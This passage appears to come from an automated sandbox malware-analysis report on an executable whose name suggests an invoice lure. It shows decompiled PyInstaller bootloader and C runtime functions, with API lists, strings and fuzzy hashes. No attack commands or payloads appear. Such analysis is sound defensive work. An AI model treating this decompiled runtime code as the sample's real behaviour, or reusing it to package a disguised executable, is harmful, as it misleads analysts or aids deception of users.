				_t28 = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, 0, 0);
				_t36 = _t28;
				if(_t28 != 0) {
					_t2 = _t28 + 1; // 0x1
					_push(2);
					_t23 = E013197F8(_t24);
					_t33 =  &_v32 + 8;
					__eflags = _t23;
					if(__eflags != 0) {
						__eflags = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, _t23, _t28);
						if(__eflags == 0) {
							_push("Failed to decode wchar_t from UTF-8\n");
							goto L6;
						}
					} else {
						_push("Out of memory.");
						_push("win32_utils_from_utf8");
						goto L7;
					}
				} else {
					_push("Failed to get wchar_t buffer size.\n");
					L6:
					_push("MultiByteToWideChar");
					L7:
					E01311860(_t25, _t36);
					_t33 = _t33 + 8;
					_t23 = 0;
				}
				_t27 = LoadLibraryA("kernel32");
				_t32 = GetProcAddress(_t27, "CreateActCtxW");
				_t30 = GetProcAddress(_t27, "ActivateActCtx");
				if(_t32 == 0 || _t30 == 0) {
					L14:
					__eflags = 0;
					return 0;
				} else {
					asm("xorps xmm0, xmm0");
					asm("movups [esp+0x10], xmm0");
					asm("movups [esp+0x24], xmm0");
					_v32 = 0x20;
					_v24 = _t23;
					_v28 = 0x10;
					 *0x133c000 =  *_t32( &_v32);
					L01319803(_t23);
					_t18 =  *0x133c000; // 0xffffffff
					if(_t18 == 0xffffffff) {
						L13:
						_push(0);
						 *0x133c000 = 0xffffffff;
						E01314860(_t25);
						goto L14;
					} else {
						_push(0x1344a50);
						_push(_t18);
						if( *_t30() == 0) {
							goto L13;
						} else {
							return 1;
						}
					}
				}
			}















                            0x01314740
                            0x01314740
                            0x0131474d
                            0x01314761
                            0x01314763
                            0x01314765
                            0x0131476e
                            0x01314771
                            0x01314779
                            0x0131477b
                            0x0131477e
                            0x01314780
                            0x0131479c
                            0x0131479e
                            0x013147a0
                            0x00000000
                            0x013147a0
                            0x01314782
                            0x01314782
                            0x01314787
                            0x00000000
                            0x01314787
                            0x01314767
                            0x01314767
                            0x013147a5
                            0x013147a5
                            0x013147aa
                            0x013147aa
                            0x013147af
                            0x013147b2
                            0x013147b2
                            0x013147c5
                            0x013147d5
                            0x013147d9
                            0x013147dd
                            0x01314853
                            0x01314853
                            0x01314859
                            0x013147e3
                            0x013147e3
                            0x013147ea
                            0x013147f0
                            0x013147f5
                            0x013147fd
                            0x01314801
                            0x0131480c
                            0x01314811
                            0x01314816
                            0x01314821
                            0x0131483c
                            0x0131483c
                            0x0131483e
                            0x01314848
                            0x00000000
                            0x01314823
                            0x01314823
                            0x01314828
                            0x0131482d
                            0x00000000
                            0x01314832
                            0x0131483b
                            0x0131483b
                            0x0131482d
                            0x01314821

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0131475F
                            • LoadLibraryA.KERNEL32(kernel32,?,?,?,?,?,?,?,?,013121A8,?,?,?,?,01312639,00000000), ref: 013147B9
                            • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 013147CD
                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 013147D7
                              • Part of subcall function 01314860: GetLastError.KERNEL32(013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 01314883
                              • Part of subcall function 01314860: FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 013148A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharErrorFormatLastLibraryLoadMessageMultiWide
                            • String ID: $ActivateActCtx$CreateActCtxW$Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$kernel32$win32_utils_from_utf8
                            • API String ID: 476984482-989751517
                            • Opcode ID: 88287ffa5c28931529da11a9ac41da7c988c781493380808a8f24b1c1ac56eb0
                            • Instruction ID: 0ff0e8c5fa000a24a614515a6a43087516136ef65ca9b01f86f8a5f0fab17f5f
                            • Opcode Fuzzy Hash: 88287ffa5c28931529da11a9ac41da7c988c781493380808a8f24b1c1ac56eb0
                            • Instruction Fuzzy Hash: 6F215C71A4431967E3346AAF6C41F57BA9C9B81B3CF14063AFD20A62C4E7A1D44483EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314860, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 46windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E01314860(void* __edx, signed int _a8192, long _a8200) {
				short _v0;
				signed int _t8;
				long _t10;
				long _t11;
				void* _t24;
				signed int _t26;

				_t24 = __edx;
				E01317880();
				_t8 =  *0x133c008; // 0xa3433343
				_a8192 = _t8 ^ _t26;
				_t10 = _a8200;
				if(_t10 == 0) {
					_t10 = GetLastError();
				}
				_t11 = FormatMessageW(0x1000, 0, _t10, 0x400,  &_v0, 0x1000, 0);
				_t32 = _t11;
				if(_t11 != 0) {
					__eflags = E01314C90(0x1344a58,  &_v0, 0x1000);
					_t19 =  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
					_t14 =  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
					__eflags = _a8192 ^ _t26 + 0x0000000c;
					E0131786A();
					return  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
				} else {
					_push("No error messages generated.\n");
					_push("FormatMessageW");
					E01311860(_t24, _t32);
					E0131786A();
					return "PyInstaller: FormatMessageW failed.";
				}
			}









                            0x01314860
                            0x01314865
                            0x0131486a
                            0x01314871
                            0x01314878
                            0x01314881
                            0x01314883
                            0x01314883
                            0x013148a2
                            0x013148a8
                            0x013148aa
                            0x013148f4
                            0x013148fb
                            0x013148fe
                            0x01314907
                            0x01314909
                            0x01314914
                            0x013148ac
                            0x013148ac
                            0x013148b1
                            0x013148b6
                            0x013148cc
                            0x013148d7
                            0x013148d7

                            APIs
                            • GetLastError.KERNEL32(013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 01314883
                              • Part of subcall function 01314C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,01344A58,?,00001000,?,?), ref: 01314CAA
                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 013148A2
                            Strings
                            • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 013148EF
                            • No error messages generated., xrefs: 013148AC
                            • FormatMessageW, xrefs: 013148B1
                            • PyInstaller: FormatMessageW failed., xrefs: 013148BE
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharErrorFormatLastMessageMultiWide
                            • String ID: FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                            • API String ID: 1653872744-3268588819
                            • Opcode ID: c22856d40d3d283ae64f8b2507bcc98d23c11c7f82f275e0a25b67d6a0d4c6e3
                            • Instruction ID: 731526bd93bf7908a7a6fbf15fd914cfeb9636359533e92ef0d41f7023bf71ce
                            • Opcode Fuzzy Hash: c22856d40d3d283ae64f8b2507bcc98d23c11c7f82f275e0a25b67d6a0d4c6e3
                            • Instruction Fuzzy Hash: 3801F7717403416BF72C97199C8BBAA77D5EF98B4DF44442CBA4DC9285F6609804C35F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132974E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E0132974E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				void* _v12;
				signed short _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				char _v460;
				signed short _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed short _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed short _v1892;
				signed short _v1896;
				intOrPtr _v1900;
				signed short _v1904;
				signed short _v1908;
				signed int _v1912;
				signed short _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				intOrPtr _v2436;
				signed int _t745;
				signed short _t755;
				signed short _t756;
				signed short _t757;
				signed int _t760;
				signed short _t763;
				signed short _t764;
				signed short _t765;
				signed short _t766;
				signed short _t769;
				signed short _t770;
				signed short _t772;
				signed short _t774;
				signed short _t775;
				signed short _t781;
				signed short _t787;
				intOrPtr _t789;
				void* _t790;
				signed int _t791;
				signed int _t792;
				signed short _t793;
				signed int _t802;
				signed int _t807;
				signed int _t808;
				signed short _t809;
				signed short _t812;
				signed short _t813;
				signed short _t814;
				signed int _t816;
				signed int _t817;
				signed int _t822;
				signed int _t823;
				signed short _t829;
				signed int _t830;
				signed int _t833;
				signed int _t838;
				signed int _t846;
				signed int* _t849;
				signed int _t853;
				signed int _t864;
				signed int _t865;
				signed short _t867;
				char* _t868;
				signed short _t871;
				signed int _t875;
				signed int _t876;
				signed short _t881;
				signed int _t883;
				signed short _t888;
				signed int _t897;
				signed int _t900;
				signed int _t902;
				signed short _t905;
				signed short _t906;
				signed int _t907;
				signed int _t910;
				signed int _t923;
				signed int _t924;
				signed short _t926;
				char* _t927;
				signed short _t930;
				signed int _t934;
				signed int _t935;
				signed int* _t937;
				signed short _t940;
				signed int _t942;
				signed short _t947;
				signed int _t955;
				signed int _t958;
				signed int _t962;
				signed int* _t969;
				intOrPtr _t971;
				void* _t972;
				intOrPtr* _t974;
				signed int* _t978;
				unsigned int _t989;
				signed int _t990;
				void* _t993;
				signed int _t994;
				void* _t996;
				signed int _t997;
				signed int _t998;
				signed short _t999;
				signed short _t1009;
				signed int _t1014;
				signed int _t1017;
				unsigned int _t1020;
				signed int _t1021;
				void* _t1024;
				signed int _t1025;
				void* _t1027;
				signed int _t1028;
				signed int _t1029;
				signed short _t1030;
				signed int _t1035;
				signed int* _t1040;
				signed int _t1042;
				signed int _t1052;
				void _t1055;
				signed int _t1058;
				void* _t1061;
				intOrPtr _t1071;
				signed short _t1075;
				signed short _t1076;
				signed int _t1081;
				signed int _t1082;
				signed int _t1085;
				signed int _t1086;
				signed int _t1088;
				signed int _t1089;
				signed short _t1090;
				signed int _t1094;
				signed int _t1098;
				signed int _t1099;
				signed short _t1100;
				signed int _t1102;
				signed int _t1103;
				signed short _t1104;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1109;
				signed int _t1110;
				signed short _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				unsigned int _t1115;
				void* _t1118;
				intOrPtr _t1120;
				signed int _t1121;
				signed int _t1122;
				signed short _t1123;
				signed int* _t1127;
				void* _t1131;
				void* _t1132;
				signed short _t1133;
				signed int _t1134;
				signed int _t1135;
				signed short _t1138;
				signed short _t1139;
				signed int _t1144;
				void* _t1146;
				signed short _t1148;
				signed int _t1151;
				char _t1156;
				signed int _t1158;
				signed short _t1159;
				signed short _t1160;
				signed short _t1161;
				signed int _t1162;
				signed short _t1163;
				signed int _t1164;
				signed short _t1168;
				signed int _t1169;
				signed int _t1170;
				signed short _t1171;
				signed int _t1172;
				unsigned int _t1175;
				void* _t1179;
				void* _t1180;
				unsigned int _t1181;
				signed short _t1186;
				signed int _t1187;
				signed short _t1189;
				signed int _t1190;
				intOrPtr* _t1192;
				signed int _t1193;
				signed int _t1195;
				signed short _t1196;
				signed int _t1199;
				signed int _t1201;
				signed short _t1202;
				void* _t1203;
				signed short _t1204;
				signed int _t1205;
				signed short _t1206;
				void* _t1209;
				signed short _t1210;
				signed short _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int* _t1217;
				signed short _t1218;
				signed short _t1219;
				signed int _t1220;
				signed int _t1221;
				intOrPtr* _t1223;
				intOrPtr* _t1224;
				signed int _t1226;
				signed int _t1228;
				signed int _t1231;
				signed int _t1237;
				signed int _t1241;
				signed short _t1246;
				signed int _t1249;
				signed short _t1250;
				signed int _t1251;
				signed short _t1252;
				signed short _t1253;
				signed int _t1254;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed short _t1259;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1265;
				signed int _t1267;
				signed int _t1268;
				signed int _t1270;
				signed int _t1272;
				signed int _t1274;
				signed int _t1276;
				signed int* _t1278;
				signed int* _t1282;
				signed int _t1291;

				_t1146 = __edx;
				_t745 =  *0x133c008; // 0xa3433343
				_v8 = _t745 ^ _t1276;
				_push(__ebx);
				_t1052 = _a20;
				_t1192 = _a16;
				_v1924 = _t1192;
				_v1920 = _t1052;
				E01329275( &_v1944, __eflags);
				_t1241 = _a8;
				_t750 = 0x2d;
				if((_t1241 & 0x80000000) == 0) {
					_t750 = 0x120;
				}
				 *_t1192 = _t750;
				 *((intOrPtr*)(_t1192 + 8)) = _t1052;
				_t1193 = _a4;
				if((_t1241 & 0x7ff00000) != 0) {
					L5:
					_t755 = E013245CE( &_a4);
					_pop(_t1067);
					__eflags = _t755;
					if(_t755 != 0) {
						_t1067 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t756 = _t755 - 1;
					__eflags = _t756;
					if(_t756 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t774 = _t756 - 1;
						__eflags = _t774;
						if(_t774 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t775 = _t774 - 1;
							__eflags = _t775;
							if(_t775 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t775 == 1;
								if(_t775 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1193;
									_a8 = _t1241 & 0x7fffffff;
									_t1291 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1195 = _v1896;
									_v1916 = _a12 + 1;
									_t1081 = _t1195 >> 0x14;
									_t781 = _t1081 & 0x000007ff;
									__eflags = _t781;
									if(_t781 != 0) {
										_t1148 = 0;
										_t781 = 0;
										__eflags = 0;
									} else {
										_t1148 = 1;
									}
									_t1196 = _t1195 & 0x000fffff;
									_t1055 = _v1900 + _t781;
									asm("adc edi, esi");
									__eflags = _t1148;
									_t1082 = _t1081 & 0x000007ff;
									_t1246 = _t1082 - 0x434 + (0 | _t1148 != 0x00000000) + 1;
									_v1872 = _t1246;
									E0132CB80(_t1082, _t1291);
									_push(_t1082);
									_push(_t1082);
									 *_t1278 = _t1291;
									_t787 = E0132F2A0(E0132CC90(), _t1291);
									_v1904 = _t787;
									__eflags = _t787 - 0x7fffffff;
									if(_t787 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t787 - 0x80000000;
										if(_t787 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1055;
									__eflags = _t1196;
									_v464 = _t1196;
									_t1058 = (0 | _t1196 != 0x00000000) + 1;
									_v472 = _t1058;
									__eflags = _t1246;
									if(_t1246 < 0) {
										__eflags = _t1246 - 0xfffffc02;
										if(_t1246 == 0xfffffc02) {
											L101:
											_t789 =  *((intOrPtr*)(_t1276 + _t1058 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1085 = 0;
												__eflags = 0;
											} else {
												_t1085 = _t789 + 1;
											}
											_t790 = 0x20;
											_t791 = _t790 - _t1085;
											__eflags = _t791 - 1;
											_t792 = _t791 & 0xffffff00 | _t791 - 0x00000001 > 0x00000000;
											__eflags = _t1058 - 0x73;
											_v1865 = _t792;
											_t1086 = _t1085 & 0xffffff00 | _t1058 - 0x00000073 > 0x00000000;
											__eflags = _t1058 - 0x73;
											if(_t1058 != 0x73) {
												L107:
												_t793 = 0;
												__eflags = 0;
											} else {
												__eflags = _t792;
												if(_t792 == 0) {
													goto L107;
												} else {
													_t793 = 1;
												}
											}
											__eflags = _t1086;
											if(_t1086 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E01319BDB( &_v468, 0x1cc,  &_v1396, 0);
												_t1278 =  &(_t1278[4]);
											} else {
												__eflags = _t793;
												if(_t793 != 0) {
													goto L126;
												} else {
													_t1113 = 0x72;
													__eflags = _t1058 - _t1113;
													if(_t1058 < _t1113) {
														_t1113 = _t1058;
													}
													__eflags = _t1113 - 0xffffffff;
													if(_t1113 != 0xffffffff) {
														_t1264 = _t1113;
														_t1223 =  &_v468 + _t1113 * 4;
														_v1880 = _t1223;
														while(1) {
															__eflags = _t1264 - _t1058;
															if(_t1264 >= _t1058) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1223;
															}
															_t210 = _t1264 - 1; // 0x70
															__eflags = _t210 - _t1058;
															if(_t210 >= _t1058) {
																_t1175 = 0;
																__eflags = 0;
															} else {
																_t1175 =  *(_t1223 - 4);
															}
															_t1223 = _t1223 - 4;
															_t969 = _v1880;
															_t1264 = _t1264 - 1;
															 *_t969 = _t1175 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t969 - 4;
															__eflags = _t1264 - 0xffffffff;
															if(_t1264 == 0xffffffff) {
																break;
															}
															_t1058 = _v472;
														}
														_t1246 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1113;
													} else {
														_t218 = _t1113 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1199 = 1 - _t1246;
											E01318520(_t1199,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1276 + 0xbad63d) = 1 << (_t1199 & 0x0000001f);
											_t802 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1114 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1114;
											__eflags = _t1058 - _t1114;
											if(_t1058 == _t1114) {
												_t1179 = 0;
												__eflags = 0;
												while(1) {
													_t971 =  *((intOrPtr*)(_t1276 + _t1179 - 0x570));
													__eflags = _t971 -  *((intOrPtr*)(_t1276 + _t1179 - 0x1d0));
													if(_t971 !=  *((intOrPtr*)(_t1276 + _t1179 - 0x1d0))) {
														goto L101;
													}
													_t1179 = _t1179 + 4;
													__eflags = _t1179 - 8;
													if(_t1179 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1180 = 0;
															__eflags = 0;
														} else {
															_t1180 = _t971 + 1;
														}
														_t972 = 0x20;
														_t1265 = _t1114;
														__eflags = _t972 - _t1180 - _t1114;
														_t974 =  &_v460;
														_v1880 = _t974;
														_t1224 = _t974;
														_t171 =  &_v1865;
														 *_t171 = _t972 - _t1180 - _t1114 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1265 - _t1058;
															if(_t1265 >= _t1058) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1224;
															}
															_t175 = _t1265 - 1; // 0x0
															__eflags = _t175 - _t1058;
															if(_t175 >= _t1058) {
																_t1181 = 0;
																__eflags = 0;
															} else {
																_t1181 =  *(_t1224 - 4);
															}
															_t1224 = _t1224 - 4;
															_t978 = _v1880;
															_t1265 = _t1265 - 1;
															 *_t978 = _t1181 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t978 - 4;
															__eflags = _t1265 - 0xffffffff;
															if(_t1265 == 0xffffffff) {
																break;
															}
															_t1058 = _v472;
														}
														__eflags = _v1865;
														_t1115 = _t1114 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1114;
														_t1226 = _t1115 >> 5;
														_v1884 = _t1115;
														_t1267 = _t1226 << 2;
														E01318520(_t1226,  &_v1396, 0, _t1267);
														 *(_t1276 + _t1267 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t802 = _t1226 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t802;
										_t1061 = 0x1cc;
										_v936 = _t802;
										__eflags = _t802 << 2;
										E01319BDB( &_v932, 0x1cc,  &_v1396, _t802 << 2);
										_t1282 =  &(_t1278[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1268 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1268;
										__eflags = _t1058 - _t1268;
										if(_t1058 != _t1268) {
											L53:
											_t989 = _v1872 + 1;
											_t990 = _t989 & 0x0000001f;
											_t1118 = 0x20;
											_v1876 = _t990;
											_t1228 = _t989 >> 5;
											_v1872 = _t1228;
											_v1908 = _t1118 - _t990;
											_t993 = E0132F280(1, _t1118 - _t990, 0);
											_t1120 =  *((intOrPtr*)(_t1276 + _t1058 * 4 - 0x1d4));
											_t994 = _t993 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t994;
											_v1912 =  !_t994;
											if( *_t108 == 0) {
												_t1121 = 0;
												__eflags = 0;
											} else {
												_t1121 = _t1120 + 1;
											}
											_t996 = 0x20;
											_t997 = _t996 - _t1121;
											_t1186 = _t1058 + _t1228;
											__eflags = _v1876 - _t997;
											_v1892 = _t1186;
											_t998 = _t997 & 0xffffff00 | _v1876 - _t997 > 0x00000000;
											__eflags = _t1186 - 0x73;
											_v1865 = _t998;
											_t1122 = _t1121 & 0xffffff00 | _t1186 - 0x00000073 > 0x00000000;
											__eflags = _t1186 - 0x73;
											if(_t1186 != 0x73) {
												L59:
												_t999 = 0;
												__eflags = 0;
											} else {
												__eflags = _t998;
												if(_t998 == 0) {
													goto L59;
												} else {
													_t999 = 1;
												}
											}
											__eflags = _t1122;
											if(_t1122 != 0) {
												L81:
												__eflags = 0;
												_t1061 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E01319BDB( &_v468, 0x1cc,  &_v1396, 0);
												_t1278 =  &(_t1278[4]);
											} else {
												__eflags = _t999;
												if(_t999 != 0) {
													goto L81;
												} else {
													_t1123 = 0x72;
													__eflags = _t1186 - _t1123;
													if(_t1186 >= _t1123) {
														_t1186 = _t1123;
														_v1892 = _t1123;
													}
													_t1009 = _t1186;
													_v1880 = _t1009;
													__eflags = _t1186 - 0xffffffff;
													if(_t1186 != 0xffffffff) {
														_t1187 = _v1872;
														_t1270 = _t1186 - _t1187;
														__eflags = _t1270;
														_t1127 =  &_v468 + _t1270 * 4;
														_v1888 = _t1127;
														while(1) {
															__eflags = _t1009 - _t1187;
															if(_t1009 < _t1187) {
																break;
															}
															__eflags = _t1270 - _t1058;
															if(_t1270 >= _t1058) {
																_t1231 = 0;
																__eflags = 0;
															} else {
																_t1231 =  *_t1127;
															}
															__eflags = _t1270 - 1 - _t1058;
															if(_t1270 - 1 >= _t1058) {
																_t1014 = 0;
																__eflags = 0;
															} else {
																_t1014 =  *(_t1127 - 4);
															}
															_t1017 = _v1880;
															_t1127 = _v1888 - 4;
															_v1888 = _t1127;
															 *(_t1276 + _t1017 * 4 - 0x1d0) = (_t1231 & _v1884) << _v1876 | (_t1014 & _v1912) >> _v1908;
															_t1009 = _t1017 - 1;
															_t1270 = _t1270 - 1;
															_v1880 = _t1009;
															__eflags = _t1009 - 0xffffffff;
															if(_t1009 != 0xffffffff) {
																_t1058 = _v472;
																continue;
															}
															break;
														}
														_t1186 = _v1892;
														_t1228 = _v1872;
														_t1268 = 2;
													}
													__eflags = _t1228;
													if(_t1228 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1228 << 2);
														_t1278 =  &(_t1278[3]);
													}
													__eflags = _v1865;
													_t1061 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1186;
													} else {
														_v472 = _t1186 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1268;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1131 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1276 + _t1131 - 0x570)) -  *((intOrPtr*)(_t1276 + _t1131 - 0x1d0));
												if( *((intOrPtr*)(_t1276 + _t1131 - 0x570)) !=  *((intOrPtr*)(_t1276 + _t1131 - 0x1d0))) {
													goto L53;
												}
												_t1131 = _t1131 + 4;
												__eflags = _t1131 - 8;
												if(_t1131 != 8) {
													continue;
												} else {
													_t1020 = _v1872 + 2;
													_t1021 = _t1020 & 0x0000001f;
													_t1132 = 0x20;
													_t1133 = _t1132 - _t1021;
													_v1888 = _t1021;
													_t1272 = _t1020 >> 5;
													_v1876 = _t1272;
													_v1908 = _t1133;
													_t1024 = E0132F280(1, _t1133, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1025 = _t1024 - 1;
													__eflags = _t1025;
													asm("bsr ecx, edi");
													_v1884 = _t1025;
													_v1912 =  !_t1025;
													if(_t1025 == 0) {
														_t1134 = 0;
														__eflags = 0;
													} else {
														_t1134 = _t1133 + 1;
													}
													_t1027 = 0x20;
													_t1028 = _t1027 - _t1134;
													_t1189 = _t1272 + 2;
													__eflags = _v1888 - _t1028;
													_v1880 = _t1189;
													_t1029 = _t1028 & 0xffffff00 | _v1888 - _t1028 > 0x00000000;
													__eflags = _t1189 - 0x73;
													_v1865 = _t1029;
													_t1135 = _t1134 & 0xffffff00 | _t1189 - 0x00000073 > 0x00000000;
													__eflags = _t1189 - 0x73;
													if(_t1189 != 0x73) {
														L28:
														_t1030 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1029;
														if(_t1029 == 0) {
															goto L28;
														} else {
															_t1030 = 1;
														}
													}
													__eflags = _t1135;
													if(_t1135 != 0) {
														L50:
														__eflags = 0;
														_t1061 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E01319BDB( &_v468, 0x1cc,  &_v1396, 0);
														_t1278 =  &(_t1278[4]);
													} else {
														__eflags = _t1030;
														if(_t1030 != 0) {
															goto L50;
														} else {
															_t1138 = 0x72;
															__eflags = _t1189 - _t1138;
															if(_t1189 >= _t1138) {
																_t1189 = _t1138;
																_v1880 = _t1138;
															}
															_t1139 = _t1189;
															_v1892 = _t1139;
															__eflags = _t1189 - 0xffffffff;
															if(_t1189 != 0xffffffff) {
																_t1190 = _v1876;
																_t1274 = _t1189 - _t1190;
																__eflags = _t1274;
																_t1040 =  &_v468 + _t1274 * 4;
																_v1872 = _t1040;
																while(1) {
																	__eflags = _t1139 - _t1190;
																	if(_t1139 < _t1190) {
																		break;
																	}
																	__eflags = _t1274 - _t1058;
																	if(_t1274 >= _t1058) {
																		_t1237 = 0;
																		__eflags = 0;
																	} else {
																		_t1237 =  *_t1040;
																	}
																	__eflags = _t1274 - 1 - _t1058;
																	if(_t1274 - 1 >= _t1058) {
																		_t1042 = 0;
																		__eflags = 0;
																	} else {
																		_t1042 =  *(_v1872 - 4);
																	}
																	_t1144 = _v1892;
																	 *(_t1276 + _t1144 * 4 - 0x1d0) = (_t1042 & _v1912) >> _v1908 | (_t1237 & _v1884) << _v1888;
																	_t1139 = _t1144 - 1;
																	_t1274 = _t1274 - 1;
																	_t1040 = _v1872 - 4;
																	_v1892 = _t1139;
																	_v1872 = _t1040;
																	__eflags = _t1139 - 0xffffffff;
																	if(_t1139 != 0xffffffff) {
																		_t1058 = _v472;
																		continue;
																	}
																	break;
																}
																_t1189 = _v1880;
																_t1272 = _v1876;
															}
															__eflags = _t1272;
															if(_t1272 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1272 << 2);
																_t1278 =  &(_t1278[3]);
															}
															__eflags = _v1865;
															_t1061 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1189;
															} else {
																_v472 = _t1189 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1035 = 4;
													__eflags = 1;
													_v1396 = _t1035;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1035);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
